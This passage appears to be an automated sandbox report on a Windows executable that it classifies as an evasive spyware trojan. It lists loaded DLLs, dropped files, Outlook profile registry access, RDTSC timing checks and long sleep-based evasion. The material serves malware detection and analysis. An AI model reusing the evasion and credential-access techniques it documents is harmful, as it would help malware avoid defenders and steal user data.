            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_368322294_2_36832229
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_368300134_2_36830013
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_368300404_2_36830040
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_36830D7B4_2_36830D7B
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_36830A104_2_36830A10
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_368308DE4_2_368308DE
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_368329114_2_36832911
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_368309604_2_36830960
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_369227884_2_36922788
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_369227704_2_36922770
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_369297714_2_36929771
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_36920F744_2_36920F74
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: String function: 00402B3A appears 51 times
            Source: Fa24c148.exe, 00000004.00000002.2951000648.00000000333D7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Fa24c148.exe
            Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Fa24c148.exe
            Source: Fa24c148.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/10@5/5
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_00404457 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404457
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\Fa24c148.exeFile created: C:\Program Files (x86)\shawJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrackJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Fa24c148.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC8A7.tmpJump to behavior
            Source: Fa24c148.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Fa24c148.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Fa24c148.exeReversingLabs: Detection: 15%
            Source: C:\Users\user\Desktop\Fa24c148.exeFile read: C:\Users\user\Desktop\Fa24c148.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Fa24c148.exe "C:\Users\user\Desktop\Fa24c148.exe"
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess created: C:\Users\user\Desktop\Fa24c148.exe "C:\Users\user\Desktop\Fa24c148.exe"
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess created: C:\Users\user\Desktop\Fa24c148.exe "C:\Users\user\Desktop\Fa24c148.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2029869938.0000000005425000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060E1
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
            Source: C:\Users\user\Desktop\Fa24c148.exeFile created: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Fa24c148.exeAPI/Special instruction interceptor: Address: 5C2938D
            Source: C:\Users\user\Desktop\Fa24c148.exeAPI/Special instruction interceptor: Address: 1FA938D
            Source: C:\Users\user\Desktop\Fa24c148.exeRDTSC instruction interceptor: First address: 5BEAA11 second address: 5BEAA11 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4458D311FAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\Fa24c148.exeRDTSC instruction interceptor: First address: 1F6AA11 second address: 1F6AA11 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4458FAFEFAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\Fa24c148.exeMemory allocated: 120000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeMemory allocated: 335C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeMemory allocated: 33230000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598844Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598735Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598610Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598485Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595967Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595641Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595391Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595063Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594938Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594813Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594594Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594469Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594359Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594250Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594141Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeWindow / User API: threadDelayed 7648Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeWindow / User API: threadDelayed 2183Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Fa24c148.exeAPI coverage: 1.7 %
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -25825441703193356s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 4484Thread sleep count: 7648 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 4484Thread sleep count: 2183 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -599078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -598969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -598844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -598735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -598610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -598485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -598360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -598235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -598110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -597985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -597860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -597735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -597485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -597360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -596985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -596860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -596735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -596360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -596235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -596110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -595967s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -595859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -595750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -595641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -595516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -595391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -595281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -595172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -595063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -594938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -594813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -594703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -594594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -594469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -594359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -594250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exe TID: 5316Thread sleep time: -594141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055FF
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_004060BA FindFirstFileW,FindClose,0_2_004060BA
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_00402770 FindFirstFileW,4_2_00402770
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004055FF
